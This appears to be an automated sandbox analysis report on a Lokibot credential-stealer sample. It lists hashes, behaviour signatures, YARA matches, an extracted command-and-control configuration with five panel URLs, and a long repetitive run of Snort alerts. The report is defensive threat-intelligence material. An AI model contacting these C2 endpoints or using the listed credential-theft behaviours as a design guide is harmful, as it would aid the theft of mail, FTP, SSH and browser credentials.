Windows Analysis Report
hfyhigXccT.exe

Overview

General Information

Sample Name: hfyhigXccT.exe
Analysis ID: 651263
MD5: f0ddd6f32e65868acc9d38b35af0e2c5
SHA1: c0b1cb63866b3b2351a8f68d38e61284c0ed2874
SHA256: 748eaf926943f0130b633506282d02f29da4d42d2172b3afce65246633994326
Tags: exe, Loki

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • hfyhigXccT.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\hfyhigXccT.exe" MD5: F0DDD6F32E65868ACC9D38B35AF0E2C5)
    • hfyhigXccT.exe (PID: 6752 cmdline: C:\Users\user\Desktop\hfyhigXccT.exe MD5: F0DDD6F32E65868ACC9D38B35AF0E2C5)
    • hfyhigXccT.exe (PID: 6764 cmdline: C:\Users\user\Desktop\hfyhigXccT.exe MD5: F0DDD6F32E65868ACC9D38B35AF0E2C5)
  • cleanup

Malware Configuration

{"C2 list": [
  "http://kbfvzoboss.bid/alien/fre.php",
  "http://alphastand.trade/alien/fre.php",
  "http://alphastand.win/alien/fre.php",
  "http://alphastand.top/alien/fre.php",
  "http://sempersim.su/gh20/fre.php"
]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x2f3ef:$des3: 68 03 66 00 00
  • 0x337e0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x338ac:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.hfyhigXccT.exe.4395410.11.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13278:$s1: http://
  • 0x16233:$s1: http://
  • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13280:$s2: https://
  • 0x13278:$f1: http://
  • 0x16233:$f1: http://
  • 0x13280:$f2: https://
0.2.hfyhigXccT.exe.4395410.11.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.hfyhigXccT.exe.4395410.11.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x133fc:$a2: last_compatible_version
0.2.hfyhigXccT.exe.4395410.11.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x123ff:$des3: 68 03 66 00 00
  • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.hfyhigXccT.exe.400000.14.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Sigma Overview

No Sigma rule has matched

Snort IDS Alerts

Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Classtype
06/23/22-18:08:31.463728 | 104.155.55.2 | 80 | 192.168.2.3 | 49745 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:10:16.412962 | 192.168.2.3 | 49896 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:08:28.518392 | 192.168.2.3 | 49744 | 104.155.55.2 | 80 | TCP | 2024312 | A Network Trojan was detected
06/23/22-18:09:36.768062 | 192.168.2.3 | 49842 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:08:56.128163 | 192.168.2.3 | 49773 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:17.520239 | 192.168.2.3 | 49787 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:09:36.710116 | 192.168.2.3 | 52487 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:30.578499 | 192.168.2.3 | 49745 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:10:03.646769 | 192.168.2.3 | 49867 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:53.475797 | 192.168.2.3 | 49772 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:56.029740 | 192.168.2.3 | 50778 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:35.758181 | 104.155.55.2 | 80 | 192.168.2.3 | 49749 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:53.475797 | 192.168.2.3 | 49772 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:04.362566 | 192.168.2.3 | 49777 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:27.695746 | 192.168.2.3 | 62547 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:45.504366 | 192.168.2.3 | 49754 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:09:22.064496 | 192.168.2.3 | 49807 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:08:56.128163 | 192.168.2.3 | 49773 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:08:45.504366 | 192.168.2.3 | 49754 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:08.917855 | 192.168.2.3 | 49780 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:08:43.382677 | 192.168.2.3 | 49751 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:09:27.755282 | 192.168.2.3 | 49832 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:11.023804 | 192.168.2.3 | 49781 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:10:03.646769 | 192.168.2.3 | 49867 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:10:09.603862 | 192.168.2.3 | 49892 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:09:10.958098 | 192.168.2.3 | 60640 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:09:08.917855 | 192.168.2.3 | 49780 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:34.891799 | 192.168.2.3 | 49749 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:08:34.891799 | 192.168.2.3 | 49749 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:10:03.591385 | 192.168.2.3 | 64635 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:56.994402 | 104.155.55.2 | 80 | 192.168.2.3 | 49773 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:47.827784 | 192.168.2.3 | 64452 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:09:00.835939 | 104.155.55.2 | 80 | 192.168.2.3 | 49775 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:05.276468 | 104.155.55.2 | 80 | 192.168.2.3 | 49777 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:55.746969 | 192.168.2.3 | 49858 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:22.916760 | 104.155.55.2 | 80 | 192.168.2.3 | 49807 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:28.518392 | 192.168.2.3 | 49744 | 104.155.55.2 | 80 | TCP | 2024317 | A Network Trojan was detected
06/23/22-18:09:09.874479 | 104.155.55.2 | 80 | 192.168.2.3 | 49780 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:10:05.859589 | 192.168.2.3 | 49879 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:08:30.578499 | 192.168.2.3 | 49745 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:08:34.825260 | 192.168.2.3 | 49873 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:59.805159 | 192.168.2.3 | 49775 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:10:09.542700 | 192.168.2.3 | 63083 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:41.569598 | 104.155.55.2 | 80 | 192.168.2.3 | 49750 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:59.728406 | 192.168.2.3 | 49865 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:08:51.674694 | 104.155.55.2 | 80 | 192.168.2.3 | 49771 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:46.411556 | 104.155.55.2 | 80 | 192.168.2.3 | 49754 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:11.023804 | 192.168.2.3 | 49781 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:09:13.136252 | 192.168.2.3 | 63861 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:32.826506 | 192.168.2.3 | 49746 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:09:55.746969 | 192.168.2.3 | 49858 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:08:50.748195 | 192.168.2.3 | 49771 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:27.755282 | 192.168.2.3 | 49832 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:48.152005 | 192.168.2.3 | 49765 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:10:04.550873 | 104.155.55.2 | 80 | 192.168.2.3 | 49867 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:40.626646 | 192.168.2.3 | 49750 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:09:20.096905 | 192.168.2.3 | 49795 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:20.096905 | 192.168.2.3 | 49795 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:43.324751 | 192.168.2.3 | 65266 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:26.365310 | 192.168.2.3 | 49743 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:08:26.293119 | 192.168.2.3 | 55923 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:32.768385 | 192.168.2.3 | 57421 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:10:14.615169 | 192.168.2.3 | 49895 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:09:47.565594 | 192.168.2.3 | 59065 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:10:14.615169 | 192.168.2.3 | 49895 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:08:53.418184 | 192.168.2.3 | 52810 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:09:13.286095 | 192.168.2.3 | 49783 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:09:47.624966 | 192.168.2.3 | 49856 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:08:32.826506 | 192.168.2.3 | 49746 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:17.520239 | 192.168.2.3 | 49787 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:02.005884 | 192.168.2.3 | 59390 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:09:06.486197 | 192.168.2.3 | 49778 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:59.728406 | 192.168.2.3 | 49865 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:10:15.552607 | 104.155.55.2 | 80 | 192.168.2.3 | 49895 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:10:17.418004 | 104.155.55.2 | 80 | 192.168.2.3 | 49896 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:28.518392 | 192.168.2.3 | 49744 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:09:36.768062 | 192.168.2.3 | 49842 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:08:50.688333 | 192.168.2.3 | 58625 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:49.079457 | 104.155.55.2 | 80 | 192.168.2.3 | 49765 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:08:53.475797 | 192.168.2.3 | 49772 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:08:48.152005 | 192.168.2.3 | 49765 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:59.728406 | 192.168.2.3 | 49865 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:08:43.382677 | 192.168.2.3 | 49751 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:08:59.805159 | 192.168.2.3 | 49775 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:09:02.062353 | 192.168.2.3 | 49776 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:09:22.007803 | 192.168.2.3 | 64412 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:09:30.935127 | 192.168.2.3 | 57442 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:09:47.624966 | 192.168.2.3 | 49856 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:08:45.504366 | 192.168.2.3 | 49754 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:10:16.412962 | 192.168.2.3 | 49896 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:08:40.300507 | 192.168.2.3 | 53802 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:43.382677 | 192.168.2.3 | 49751 | 104.155.55.2 | 80 | TCP | 2825766 | A Network Trojan was detected
06/23/22-18:10:09.603862 | 192.168.2.3 | 49892 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:10:09.603862 | 192.168.2.3 | 49892 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:40.626646 | 192.168.2.3 | 49750 | 104.155.55.2 | 80 | TCP | 2024313 | A Network Trojan was detected
06/23/22-18:09:21.018222 | 104.155.55.2 | 80 | 192.168.2.3 | 49795 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:47.624966 | 192.168.2.3 | 49856 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:08:40.626646 | 192.168.2.3 | 49750 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:08:56.128163 | 192.168.2.3 | 49773 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:09:59.580734 | 192.168.2.3 | 55795 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:44.299706 | 104.155.55.2 | 80 | 192.168.2.3 | 49751 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:59.728406 | 192.168.2.3 | 49865 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:09:02.062353 | 192.168.2.3 | 49776 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:08:59.746955 | 192.168.2.3 | 59795 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:10:16.412962 | 192.168.2.3 | 49896 | 104.155.55.2 | 80 | TCP | 2024318 | A Network Trojan was detected
06/23/22-18:09:04.362566 | 192.168.2.3 | 49777 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:10:00.690473 | 104.155.55.2 | 80 | 192.168.2.3 | 49865 | TCP | 2025483 | A Network Trojan was detected
06/23/22-18:09:13.286095 | 192.168.2.3 | 49783 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:20.096905 | 192.168.2.3 | 49795 | 104.155.55.2 | 80 | TCP | 2021641 | A Network Trojan was detected
06/23/22-18:09:08.917855 | 192.168.2.3 | 49780 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:30.995615 | 192.168.2.3 | 49838 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:55.686777 | 192.168.2.3 | 64589 | 8.8.8.8 | 53 | UDP | 2014169 | Potentially Bad Traffic
06/23/22-18:08:34.891799 | 192.168.2.3 | 49749 | 104.155.55.2 | 80 | TCP | 2025381 | A Network Trojan was detected
06/23/22-18:09:55.746969 | 192.168.2.3 | 49858 | 104.155.55.2 | 80 |  | 2024318 | 
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249775802024313 06/23/22-18:08:59.805159
              SID:2024313
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249858802024313 06/23/22-18:09:55.746969
              SID:2024313
              Source Port:49858
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249754802825766 06/23/22-18:08:45.504366
              SID:2825766
              Source Port:49754
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497782025483 06/23/22-18:09:07.428229
              SID:2025483
              Source Port:80
              Destination Port:49778
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249795802825766 06/23/22-18:09:20.096905
              SID:2825766
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802025381 06/23/22-18:10:05.859589
              SID:2025381
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497812025483 06/23/22-18:09:11.937966
              SID:2025483
              Source Port:80
              Destination Port:49781
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802024318 06/23/22-18:09:36.768062
              SID:2024318
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802025381 06/23/22-18:09:41.932837
              SID:2025381
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249746802825766 06/23/22-18:08:32.826506
              SID:2825766
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.860195532014169 06/23/22-18:10:16.356290
              SID:2014169
              Source Port:60195
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380497462025483 06/23/22-18:08:33.658945
              SID:2025483
              Source Port:80
              Destination Port:49746
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.858950532014169 06/23/22-18:09:41.871608
              SID:2014169
              Source Port:58950
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249778802024318 06/23/22-18:09:06.486197
              SID:2024318
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249775802021641 06/23/22-18:08:59.805159
              SID:2021641
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249765802021641 06/23/22-18:08:48.152005
              SID:2021641
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802024313 06/23/22-18:09:11.023804
              SID:2024313
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249781802024318 06/23/22-18:09:11.023804
              SID:2024318
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249895802025381 06/23/22-18:10:14.615169
              SID:2025381
              Source Port:49895
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498792025483 06/23/22-18:10:06.706850
              SID:2025483
              Source Port:80
              Destination Port:49879
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802024318 06/23/22-18:08:30.578499
              SID:2024318
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.858116532014169 06/23/22-18:08:30.221090
              SID:2014169
              Source Port:58116
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:104.155.55.2192.168.2.380498322025483 06/23/22-18:09:28.697078
              SID:2025483
              Source Port:80
              Destination Port:49832
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802024312 06/23/22-18:08:26.365310
              SID:2024312
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802024318 06/23/22-18:09:30.995615
              SID:2024318
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249778802024313 06/23/22-18:09:06.486197
              SID:2024313
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380498382025483 06/23/22-18:09:31.916398
              SID:2025483
              Source Port:80
              Destination Port:49838
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864996532014169 06/23/22-18:09:06.418101
              SID:2014169
              Source Port:64996
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249750802021641 06/23/22-18:08:40.626646
              SID:2021641
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249773802024318 06/23/22-18:08:56.128163
              SID:2024318
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249856802024313 06/23/22-18:09:47.624966
              SID:2024313
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249838802024313 06/23/22-18:09:30.995615
              SID:2024313
              Source Port:49838
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249746802025381 06/23/22-18:08:32.826506
              SID:2025381
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249787802025381 06/23/22-18:09:17.520239
              SID:2025381
              Source Port:49787
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.862724532014169 06/23/22-18:09:19.486245
              SID:2014169
              Source Port:62724
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249773802024313 06/23/22-18:08:56.128163
              SID:2024313
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802024313 06/23/22-18:09:22.064496
              SID:2024313
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249856802024318 06/23/22-18:09:47.624966
              SID:2024318
              Source Port:49856
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249879802825766 06/23/22-18:10:05.859589
              SID:2825766
              Source Port:49879
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249776802024313 06/23/22-18:09:02.062353
              SID:2024313
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249772802825766 06/23/22-18:08:53.475797
              SID:2825766
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:104.155.55.2192.168.2.380497722025483 06/23/22-18:08:54.444254
              SID:2025483
              Source Port:80
              Destination Port:49772
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249850802021641 06/23/22-18:09:41.932837
              SID:2021641
              Source Port:49850
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249807802024318 06/23/22-18:09:22.064496
              SID:2024318
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249743802024317 06/23/22-18:08:26.365310
              SID:2024317
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249896802021641 06/23/22-18:10:16.412962
              SID:2021641
              Source Port:49896
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249744802825766 06/23/22-18:08:28.518392
              SID:2825766
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249842802825766 06/23/22-18:09:36.768062
              SID:2825766
              Source Port:49842
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249745802021641 06/23/22-18:08:30.578499
              SID:2021641
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249867802025381 06/23/22-18:10:03.646769
              SID:2025381
              Source Port:49867
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249783802021641 06/23/22-18:09:13.286095
              SID:2021641
              Source Port:49783
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.155.55.249771802024318 06/23/22-18:08:50.748195
              SID:2024318
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.864816532014169 06/23/22-18:09:04.295727
              SID:2014169
              Source Port:64816
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3104.155.55.249832802025381 06/23/22-18:09:27.755282
              SID:2025381
              Source Port:49832
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
